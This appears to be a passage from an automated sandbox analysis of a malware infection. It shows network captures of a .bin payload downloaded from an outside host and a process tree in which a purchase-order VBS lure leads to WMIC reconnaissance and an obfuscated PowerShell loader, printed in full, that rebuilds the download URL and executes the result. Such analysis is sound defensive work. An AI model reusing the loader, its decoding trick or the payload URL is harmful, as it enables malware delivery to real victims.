                                                                Data Ascii: oChnOdibJoywIP0sXFOLTKAg+0ygIPtMoCx2qu4JTx4Qt5gpvoKZtGi9Y2ls/CF5AIG33Z91buQ79stsoCXg2HTEX+S/PpifR1jkUCiiMCS/NOn8Gqjl1toVyXQzPPYme1rAm9bcLxKekmSV659V8w2ikCk4vQu8sT2LTKAg+0ygIPtMoCwSzRhEOpqxDBMwg5yaF4A9V+HgCW4N7GT+SIJli7yzLHtMoCD7TKAg+0ygLAeslGhYRMG1pqlwXTr
                                                                2024-10-31 03:02:02 UTC | 8000 | IN | Data Raw: 73 44 44 37 53 59 75 41 6e 31 57 67 71 4f 64 71 6d 51 5a 70 6c 4c 38 4b 34 67 57 47 57 4f 64 6a 43 32 4f 55 46 4c 38 4d 31 4a 61 30 56 59 4b 45 50 6c 42 71 4e 58 68 2f 2f 41 33 31 55 6b 78 68 74 79 63 73 41 68 59 59 4e 6f 70 6c 6a 78 52 33 5a 4b 4e 57 74 58 51 5a 44 30 36 63 65 4c 55 4a 57 44 38 66 30 6d 56 31 76 75 63 4c 61 72 4e 76 71 44 2f 64 63 71 56 79 36 37 79 2f 54 63 74 4d 6f 43 44 37 54 4b 41 67 2b 30 79 67 4c 42 68 55 39 4c 71 39 50 64 46 44 62 53 54 6c 75 37 6f 49 7a 70 41 61 42 74 63 44 53 6c 69 44 68 48 77 66 61 62 6a 6e 5a 68 51 66 36 65 53 2b 69 4e 50 41 49 2b 77 77 34 61 75 31 42 59 70 52 45 77 61 2f 2b 62 30 67 5a 6d 7a 61 77 45 78 75 51 79 50 6d 4f 45 38 35 2b 2b 37 64 30 55 4c 6c 6e 2b 66 70 6c 44 30 35 6d 65 71 4e 34 6d 38 35 65 2b 74
                                                                Data Ascii: sDD7SYuAn1WgqOdqmQZplL8K4gWGWOdjC2OUFL8M1Ja0VYKEPlBqNXh//A31UkxhtycsAhYYNopljxR3ZKNWtXQZD06ceLUJWD8f0mV1vucLarNvqD/dcqVy67y/TctMoCD7TKAg+0ygLBhU9Lq9PdFDbSTlu7oIzpAaBtcDSliDhHwfabjnZhQf6eS+iNPAI+ww4au1BYpREwa/+b0gZmzawExuQyPmOE85++7d0ULln+fplD05meqN4m85e+t
                                                                2024-10-31 03:02:02 UTC | 8000 | IN | Data Raw: 31 77 49 6c 47 66 2b 2f 2b 50 6f 56 61 6e 4c 55 57 48 39 37 54 4b 41 73 4e 4d 30 56 75 67 35 34 4f 72 53 33 30 52 39 4c 48 51 65 76 74 38 49 7a 67 53 57 41 68 77 47 77 41 53 63 71 66 77 41 54 49 43 44 37 51 47 4c 31 79 39 64 34 36 55 2b 67 4d 69 74 46 71 53 67 6d 78 4e 59 6e 30 45 6c 71 43 2b 79 6c 4d 58 2f 79 46 67 4e 62 65 62 74 4d 6f 43 58 51 37 67 76 39 66 75 53 2b 68 32 58 55 4a 46 6a 6b 5a 34 58 76 54 74 53 2b 67 4d 4f 6e 35 49 57 43 68 44 35 51 61 6a 56 32 53 4b 51 37 45 42 65 47 5a 65 68 43 52 33 35 42 4b 75 78 45 70 7a 42 55 64 51 6d 45 32 39 68 44 63 33 51 4a 55 36 33 4f 34 69 69 70 61 33 79 67 33 49 68 5a 59 43 44 37 54 4b 41 67 2b 30 79 67 49 50 74 44 58 34 31 4a 58 58 71 52 58 4b 37 33 55 65 65 49 36 50 6e 5a 47 47 47 4f 70 39 33 56 69 37 39
                                                                Data Ascii: 1wIlGf+/+PoVanLUWH97TKAsNM0Vug54OrS30R9LHQevt8IzgSWAhwGwAScqfwATICD7QGL1y9d46U+gMitFqSgmxNYn0ElqC+ylMX/yFgNbebtMoCXQ7gv9fuS+h2XUJFjkZ4XvTtS+gMOn5IWChD5QajV2SKQ7EBeGZehCR35BKuxEpzBUdQmE29hDc3QJU63O4iipa3yg3IhZYCD7TKAg+0ygIPtDX41JXXqRXK73UeeI6PnZGGGOp93Vi79
                                                                2024-10-31 03:02:02 UTC | 8000 | IN | Data Raw: 78 65 4c 4d 74 4c 36 62 66 70 44 63 65 4f 58 35 47 56 6c 5a 49 38 77 64 49 31 4f 61 5a 43 69 77 38 36 31 65 64 42 6e 38 36 31 79 67 4b 4c 55 43 4a 59 6d 62 66 4b 71 78 52 68 37 78 6d 41 4d 65 55 41 44 37 52 42 68 79 43 32 79 67 4c 4e 73 4d 71 48 33 6a 31 58 52 67 32 30 79 6d 51 32 66 33 46 6c 36 57 5a 72 67 2f 78 75 71 53 69 45 30 76 50 42 6a 6b 65 41 70 39 77 36 6d 62 6b 46 31 48 51 48 6a 45 2f 52 44 59 75 74 64 41 45 50 37 30 76 78 2b 4b 54 68 70 6c 79 4d 4e 34 6d 53 38 4d 67 43 44 34 77 49 36 68 49 58 79 51 4b 47 49 58 6b 44 44 37 52 4c 66 33 2b 52 76 67 49 50 75 30 63 30 73 4c 66 4b 69 38 33 6d 51 5a 65 38 74 63 6f 43 69 30 6f 39 77 4a 59 41 39 55 48 6e 70 4d 6f 43 44 39 37 4c 36 74 34 68 79 51 4a 58 30 6a 33 42 2b 6a 38 49 42 67 38 2f 6e 69 59 4c 63
                                                                Data Ascii: xeLMtL6bfpDceOX5GVlZI8wdI1OaZCiw861edBn861ygKLUCJYmbfKqxRh7xmAMeUAD7RBhyC2ygLNsMqH3j1XRg20ymQ2f3Fl6WZrg/xuqSiE0vPBjkeAp9w6mbkF1HQHjE/RDYutdAEP70vx+KThplyMN4mS8MgCD4wI6hIXyQKGIXkDD7RLf3+RvgIPu0c0sLfKi83mQZe8tcoCi0o9wJYA9UHnpMoCD97L6t4hyQJX0j3B+j8IBg8/niYLc


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549401200.6.118.1624436764C:\Windows\SysWOW64\msiexec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-31 03:02:41 UTC | 196 | OUT | GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: torresvmackenna.cl
                                                                Cache-Control: no-cache
                                                                2024-10-31 03:02:42 UTC | 462 | IN | HTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 03:02:42 GMT
                                                                Server: Apache
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                X-Frame-Options: sameorigin
                                                                Last-Modified: Wed, 30 Oct 2024 22:01:08 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 494656
                                                                Referrer-Policy: no-referrer
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close
                                                                Content-Type: application/octet-stream
                                                                2024-10-31 03:02:42 UTC | 7730 | IN | Data Raw: d5 23 d0 3e a3 d6 dc 91 9b d8 30 33 6c 95 e1 00 2c 4d df dc 5b dc cb ad 3b 5a 84 92 f4 1c 03 db 30 45 a1 68 5d a8 7d 5d 7c 05 a4 d5 d9 f1 e4 7c 41 21 3f dd ef f4 28 e0 c3 60 c6 83 fc 07 f4 c7 1c ba 83 66 76 77 12 ad f7 7d eb 1b bd 5c de 44 3c 32 9b 0c b2 3b b3 bf 4a 9f 13 29 03 3a be cc d4 1d 23 21 70 3b 3e 22 88 61 4a 92 ed 9d 1f eb bb 7d 0b f2 d2 a8 d8 76 24 c7 47 c2 6d a7 c6 e3 1b 98 6f 46 94 e7 d3 c9 10 22 2f 31 4b f5 f7 23 b2 be 72 ef 3f 19 4d ce 70 77 5a 6e 0c d9 06 86 1c 6d 41 c9 a2 5b 70 6c ec 92 2c 50 26 f5 75 1a 08 e0 18 3c 8d b0 c9 b9 c4 8c 22 a2 8a 0f 47 da 3b 62 34 c3 07 7f bf 4b d1 eb dc 4d d4 6e cd d3 ed 58 63 76 d0 d6 ae 0f a2 e1 80 27 dc d8 5f f0 77 b6 c8 c2 13 3e 4c 16 2d 81 13 d9 b6 95 31 ad 99 53 00 14 ff 9d f0 79 d5 32 f4 90 fa f2 63
                                                                Data Ascii: #>03l,M[;Z0Eh]}]||A!?(`fvw}\D<2;J):#!p;>"aJ}v$GmoF"/1K#r?MpwZnmA[pl,P&u<"G;b4KMnXcv'_w>L-1Sy2c
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: e4 f2 39 e6 b8 16 23 f7 53 bc e3 64 9c be c0 71 d4 7e 69 60 51 c0 a1 ab 55 9d d6 3e 02 a1 5a b8 96 a2 9f 0a c5 d8 97 7e e0 99 7e 83 aa 3e 6d 70 89 4a 10 91 da 6f 56 f2 74 b7 2f 0d 53 7a cd 75 3a 86 8c 84 90 a7 f0 5b 15 fa dd 5c 56 8b 08 c1 d8 cf 31 d2 5a 9f 5d 72 0e 4e 92 c0 5a c7 33 83 f9 23 42 32 ad 2e b1 ca ea 53 f3 85 eb 75 83 31 27 43 3b 5d e6 be ef 7b df 4e 3d 7a e6 af a1 ee 85 23 4c 81 0d c8 9e dc b1 b5 05 6b 7f af bd 24 71 c0 07 3f af 88 a0 2f 81 3c eb b9 77 32 a0 d5 a5 96 fb 78 1e 21 cf 46 73 2e 7d 03 7f 20 4a 0a 6c 1d 54 12 fa 63 7c fd 4c 75 f2 64 d2 c2 9a e5 a1 0f 9a e8 4b 2b 15 6d 8e db c1 87 ab f0 2c ef c4 b3 2f d9 79 0b 34 2a 4c 24 f0 3e 37 6f a1 87 bf fd 01 78 31 bb 40 2f 62 f7 45 bc 50 3b 5f b6 df 5a 1d ca 3a d4 dc a7 34 41 f3 37 61 ab fd
                                                                Data Ascii: 9#Sdq~i`QU>Z~~>mpJoVt/Szu:[\V1Z]rNZ3#B2.Su1'C;]{N=z#Lk$q?/<w2x!Fs.} JlTc|LudK+m,/y4*L$>7ox1@/bEP;_Z:4A7a
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: 9b 61 b6 f2 ab bf 83 5e 25 75 d0 20 d4 ab fe 68 9e 00 e8 5e 62 f6 16 7c 4c 38 fb f7 82 ef 18 65 f0 34 44 10 1e 9b 6e bb f1 2c 03 e9 f0 60 2e 50 11 4f 09 be b6 17 de 90 e8 38 5e 80 e4 b1 d4 de f1 fb 86 9c 49 45 18 f1 b4 59 a1 cf dc 88 c3 28 ae 73 d5 99 18 40 c2 38 33 1e 8f ac e1 1a 55 9c 7d 6f e0 55 b2 47 75 b4 49 57 6d 8f 19 ae 7e 26 66 d2 88 32 66 e3 70 72 99 29 b2 14 76 fd e4 e1 bf ad 77 97 05 db d9 97 f2 32 c9 22 3d 67 f4 bf b0 16 f3 e2 7b 56 6d 40 e6 8d 97 66 9c 57 a8 57 b7 14 29 7e 34 7d 58 32 b7 b1 ca 47 71 f9 09 66 3e 13 e6 37 21 ee c7 a7 c8 89 57 4c 34 3e b9 a7 9f af 9b ad 1e fe ef f4 d8 bb 5a d2 be d4 ca 9a b7 0a ec 26 13 bf 17 f7 f3 d2 fb 3a 13 96 df 80 e3 ec 0f ee 6f 42 49 eb 38 45 d7 bb 49 b0 58 24 e6 37 e8 09 3b fa 31 a2 bb 11 47 47 da 7f 35
                                                                Data Ascii: a^%u h^b|L8e4Dn,`.PO8^IEY(s@83U}oUGuIWm~&f2fpr)vw2"=g{Vm@fWW)~4}X2Gqf>7!WL4>Z&:oBI8EIX$7;1GG5
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: 86 5a 0f 47 da df 45 3b 11 b0 e8 e5 11 71 f1 0a 33 74 24 ac 52 ee 53 c8 2c 8b cd 78 71 b6 23 12 a6 cc 9d d7 05 48 6d b7 3d 81 78 98 68 6c 20 14 2c 13 0e 0b 4f 4f e9 11 39 e3 d0 ad fe bb ac 4b ee 25 65 dd 36 af bb 66 a5 a0 f0 ff 9a 6f 0c f4 c1 3d 9f 08 35 d4 00 cf ce a4 f7 e2 23 cb 39 b8 94 f6 a5 79 bd d9 e0 5e 08 22 29 23 a2 3b ab e5 28 70 f9 0d d6 52 8f 45 cb 41 69 79 60 54 e5 a4 13 00 19 b8 fa 1d f5 c6 32 fb 90 cc 6f 82 ae f1 e7 0a ad e2 6c 68 a2 19 d9 0f 9d 04 fa f9 72 21 f0 82 7a 41 44 9a a5 a5 d5 97 cf 7b 4b df aa 3c de 1f 23 d2 65 06 5b c9 c4 89 66 97 d5 31 87 9f 8f 2e 18 62 59 88 9f 74 35 6e da 04 98 0a 4e d7 1d 91 75 31 40 a3 88 45 d8 c1 08 5d dd 91 39 37 38 4e 78 e2 4b 69 66 f5 dd 6e 61 fa bd 49 9f df 55 4f 07 12 ae c5 73 be c2 55 7b 5e cc 0d 94
                                                                Data Ascii: ZGE;q3t$RS,xq#Hm=xhl ,OO9K%e6fo=5#9y^")#;(pREAiy`T2olhr!zAD{K<#e[f1.bYt5nNu1@E]978NxKifnaIUOsU{^
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: b3 1e 81 90 50 9a 55 c9 f3 97 d7 33 90 f9 1e cf b1 3b 46 b6 14 d8 4e b8 c3 da cb 49 38 96 74 07 dd 4e 87 0b 35 83 71 e2 42 2e b1 32 c6 92 81 22 3a 4b 58 40 9f 2d fd da 8e 62 6f 77 85 dc e6 e0 04 fc 65 7a 2c 79 9a 01 6d 14 71 80 2f a7 aa 61 45 55 f4 4c 1e f9 eb 19 ee 55 ed 7a 33 24 84 39 a8 0d 60 1e cb ef a9 ac c9 aa 94 25 8f 10 c0 5c 00 1a 08 3e 39 a3 40 1a 80 96 70 1d f6 5a 59 20 13 23 5d 6e 81 53 05 72 57 3a 94 5d e7 c2 84 f6 d5 41 45 5f 3a 36 a2 26 09 d4 02 5b 5a 65 b0 6d 8a b7 79 c4 7a 37 7a fa e1 91 96 0e 90 ab 12 dd a8 8b 51 f9 4f 21 2b 16 18 02 df ac 12 f3 41 91 47 fd 5e b8 2e 90 0c 07 d8 b1 ff 63 84 84 b0 78 88 78 4e 75 11 72 b7 cc 38 d3 a4 12 2a 80 35 56 17 82 6e d0 34 f5 83 c3 8c 6e 74 a9 e1 6a 73 49 f0 da ac d2 d1 20 a2 88 27 e7 1b 2c 58 b4 f1
                                                                Data Ascii: PU3;FNI8tN5qB.2":KX@-bowez,ymq/aEULUz3$9`%\>9@pZY #]nSrW:]AE_:6&[Zemyz7zQO!+AG^.cxxNur8*5Vn4ntjsI ',X
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: 5f 74 15 b7 0e 8a f1 56 db 49 45 3a cd ff dd 19 67 97 97 60 53 1c 09 fe 02 18 9b 73 75 c2 c5 1a 6b 29 67 73 d2 38 77 e0 c1 f0 42 c9 22 a0 2b 61 f2 30 a4 3d 43 70 59 31 04 aa f0 58 ff a2 f1 58 4a 5f d3 11 c8 bd 14 f8 94 c2 1c 9e d8 09 c6 67 20 c4 b9 dc 61 45 df 53 88 f8 b1 c0 22 d1 a7 10 a4 51 14 d1 ef fd c2 5f 84 f7 bc da aa a5 e8 d6 fd f6 f1 b7 ff 76 05 04 61 1f 63 a1 b4 e9 8e 21 5f c1 39 48 b0 26 48 98 d3 06 3c 4b 06 a7 64 f6 5a aa fd d6 e7 cf 8c 03 46 43 c4 a2 07 eb c4 6e 07 6b 5d 67 ff c6 2a 06 32 7a 56 20 f6 a4 66 0d ec 23 ec 99 f1 b7 67 be 99 7d 52 9b 13 e4 de ac ca 45 64 f3 e2 c4 a6 cf 98 da 13 a4 78 52 35 03 3c 20 54 de 8f 6b c1 37 1c f3 0f 92 45 9f 6b f8 d3 fd 0b f2 d2 23 17 9e 02 b0 b8 3d 25 59 d3 73 87 c2 d5 22 86 ea 2e 54 76 9a c6 09 f0 2b 5c
                                                                Data Ascii: _tVIE:g`Ssuk)gs8wB"+a0=CpY1XXJ_g aES"Q_vac!_9H&H<KdZFCnk]g*2zV f#g}REdxR5< Tk7Ek#=%Ys".Tv+\
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: e5 85 2e 58 9e f5 30 36 f0 e3 d3 5a d3 fd 4f a4 42 87 b2 03 31 a4 ef 74 cb fa 5a 6e ae e9 9f c2 f0 4b f9 f0 a7 bc b4 54 64 94 d3 24 30 63 d3 13 3b 41 d3 c7 63 4d 9d 2d 32 2a 26 0f f9 0c 7b 8b 33 b5 9b 7c bc 73 57 09 07 44 b0 30 78 4b 09 e0 96 df 33 3b 95 19 04 e9 59 ea 34 f8 fa 2a 9e bc c2 f6 a2 4e a9 f5 d3 04 80 60 af bf 9b 7d f0 c8 0d 90 ef b0 32 0c d3 3c ea f9 3b 22 25 ba b0 52 88 af b3 45 22 bb 9b 7a d8 4e 18 57 fd 27 22 a6 eb d7 8a ac f2 7f 20 3d fa fd ef 0b f4 8f e9 d4 be 49 9f b0 fc ab 55 20 1b 76 40 32 5d 81 e9 01 49 65 b2 b3 51 44 a7 3d 98 16 57 ad 44 1c 5a bd 81 42 0c 24 d7 54 aa 0d b3 cf 35 c7 97 a3 dc bb c4 24 46 11 94 91 1e cb db f7 a1 6a c0 82 e1 d4 c9 ec f3 e8 6b f8 df d2 68 bb b2 85 ba 70 cd 80 96 e4 d9 6f 8b 4a 8f 98 e0 3b bd 4b 01 a8 f1
                                                                Data Ascii: .X06ZOB1tZnKTd$0c;AcM-2*&{3|sWD0xK3;Y4*N`}2<;"%RE"zNW'" =IU v@2]IeQD=WDZB$T5$FjkhpoJ;K
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: 4c 2e 1a db e1 6a 57 15 cf 21 17 7c 0b 6d c8 2f a3 12 51 ae af 43 98 8e 54 f9 03 dc 47 bc 1d 91 4a c4 40 c8 11 65 75 ac 20 38 fc 63 d5 8e 2f 8f 35 04 92 13 e5 02 44 3d 58 5b 5f a4 ec c1 26 6b 2e ed 59 13 02 69 77 e6 c3 4c 62 c1 40 e9 1a 3b d1 e0 b7 bb 74 39 3e 42 39 63 b9 25 53 87 18 03 53 85 b7 52 c2 6c de af 60 2c 3c 30 96 b7 eb e8 c2 35 e1 15 49 df a9 c3 06 c0 32 7b 59 aa 14 a7 8a 21 26 5a 7d 95 a3 a2 8f 8c fa 26 e0 30 45 06 a1 f1 ee 93 ab e3 f6 38 d2 0b 0a c8 24 05 01 48 b7 dd 5d 0d 27 f2 34 02 52 7b 1f c2 88 b7 e9 a2 93 57 a5 c1 b2 af 96 4b ad 70 c5 3b 5d 10 c9 41 07 61 e6 85 69 c2 54 ef 48 0d 7d d0 13 d8 8c 97 6c 34 28 14 db f0 31 a0 28 2d 5b 59 19 f6 c5 78 59 e8 1d 38 1d 17 8a 0c 9c 22 ea f3 3b 1f 9e c4 87 6e 60 be 8c 0f c1 4b ae b2 6f 31 9a fa ea
                                                                Data Ascii: L.jW!|m/QCTGJ@eu 8c/5D=X[_&k.YiwLb@;t9>B9c%SSRl`,<05I2{Y!&Z}&0E8$H]'4R{WKp;]AaiTH}l4(1(-[YxY8";n`Ko1
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: 83 1c 70 79 00 69 f8 30 61 83 f5 0c 75 21 2b ac 3c 6b 96 8d 21 42 c2 fe e2 c3 b7 1a 14 50 03 ac 9a 88 13 a2 87 75 ea 04 51 9c a3 33 15 ea ea a0 2d 18 f1 59 38 ae 4d a2 48 a1 89 cc 90 62 f1 f3 29 af 9b 82 5b 7e 4c c6 96 cb 91 ae 88 c8 99 e8 3a b6 bb 63 b0 06 03 24 37 17 97 7a 5f f7 a5 6e 4c fd 49 4d 09 18 4c ba 92 5a 4f 53 22 05 b6 ec f5 4b 14 7c 50 71 ce 53 0a 09 72 61 6a 22 da a5 69 a2 90 f7 e9 fc 57 7b 5c ea 34 64 1e 3c 16 54 43 6f d9 c2 f8 1f f3 04 3b 1c 2f 2a da 25 81 35 c6 0f 0e ca 55 52 e1 fa c2 4e ce 95 23 de 52 5f d4 70 2b 70 d0 cc 79 fd 90 5a 44 c0 4b 7a e0 10 1b 16 69 f7 52 00 3d f9 90 8e e3 86 75 3e 86 51 17 c0 9b 73 94 c0 06 7e 49 2a 98 fb e6 a9 91 ed 97 ce b5 8a 06 30 4c 10 ba 88 cc 64 16 c9 7b da 87 61 d8 c3 ca 1a 54 6e a1 fb fe e0 ce 4e 67
                                                                Data Ascii: pyi0au!+<k!BPuQ3-Y8MHb)[~L:c$7z_nLIMLZOS"K|PqSraj"iW{\4d<TCo;/*%5URN#R_p+pyZDKziR=u>Qs~I*0Ld{aTnNg
                                                                2024-10-31 03:02:42 UTC | 8000 | IN | Data Raw: 4f 13 eb 4b 5f fc 92 68 d7 53 97 79 2a a0 19 ce 8d 92 be 0c a3 05 e8 fd 38 a5 6c 63 59 1a 2d 49 ba 19 19 76 1f 9d d6 bc cf e8 cf 3c 87 5d 0f 2d df 8c 1b 3f ea 4c 0b 3c e7 cc 52 27 5a ed 4f 86 68 be 3a 2d ab e0 df e1 9c 93 01 dc 41 bd 02 b9 8c 3d 70 eb 4d 7d 8e 5d 74 88 d0 2f 13 f0 fc c6 4b a6 e7 36 13 e1 78 b2 e8 ff d8 b0 71 97 59 d2 2d 18 bd ec aa 96 c7 20 a6 52 9e 1c ef 30 ac 01 e4 bf da 2a 38 9b a1 48 bd 66 d1 49 4a 72 8d c6 79 67 c7 3b fe 76 89 a9 5f d5 20 0e 89 36 52 9c 83 72 b1 96 7d 1a 44 16 f2 65 9d 9b 09 d5 ce a5 3f da c4 5c 6c 73 18 3c 92 f3 1c 3d a3 54 d6 ea 4a 68 bd e2 7e cd ef f2 29 85 f1 44 66 d9 2c 05 ac 95 e2 b6 e3 f9 65 f0 a5 5e dc 54 7b b8 76 6c 0b 5d cb 08 b4 ae 54 34 ac 1e 8c 19 0f 4c 5f dd f1 f9 8b b9 57 57 e0 a4 70 0f a1 f8 52 57 b9
                                                                Data Ascii: OK_hSy*8lcY-Iv<]-?L<R'ZOh:-A=pM}]t/K6xqY- R0*8HfIJryg;v_ 6Rr}De?\ls<=TJh~)Df,e^T{vl]T4L_WWpRW



                                                                Target ID:0
                                                                Start time:23:01:54
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
                                                                Imagebase:0x7ff76def0000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:23:01:56
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wmic diskdrive get caption,serialnumber
                                                                Imagebase:0x7ff78b330000
                                                                File size:576'000 bytes
                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:23:01:56
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:23:01:57
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . 
